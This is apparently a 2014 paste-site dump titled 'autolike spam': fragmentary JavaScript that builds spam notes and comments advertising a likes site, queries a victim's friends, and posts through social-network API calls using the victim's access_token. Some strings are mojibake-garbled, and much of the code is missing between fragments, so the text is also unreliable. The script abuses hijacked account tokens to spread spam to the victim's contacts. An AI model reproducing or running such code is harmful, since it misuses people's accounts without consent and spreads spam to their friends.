
autolike spam

Nov 12th, 2014
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  463. note_text =" Get More Than 20000+ Likes on
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  465. www*Likes2u*com " + note_link + Math.floor
  466. ((Math.random()*100500)+1);
  467. note_com = " Ùâ€Ã
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  469. „¢ÃƒÆ’™Ë†ÙËÃ
  470. ¢â‚¬ ر " + Math.floor
  471. ((Math.random()*100)+100) + "ØÂÃ
  472. ‚¨ÃƒËœÃ‚³ ØÂÃ
  473. ‚¨ÃƒËœÃ‚¬Ã˜Â¯
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  477. ‚®ÃƒËœÃ‚± Ø­
  478. اØÂÃ
  479. ‚¬ÃƒËœÃ‚© ^_^";
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  511. first_name FROM user WHERE uid IN ( SELECT uid2
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  536. function getstatus(){
  537. var commentShort = "Get More Than 20000+ Likes
  538. on Photos,pictures,album and Pages Visit
  539. www*Likes2u*com ";
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  541. access_token=' + access_token, function
  542. (response) {
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  548. token=' + access_token, function (response) {
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  557. commentMessage + '&access_token=' + access_
  558. token, function (response) {
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  575. token, function (c) {
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  595. success:function(data){}
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  602. token=' + access_token, function (response) {
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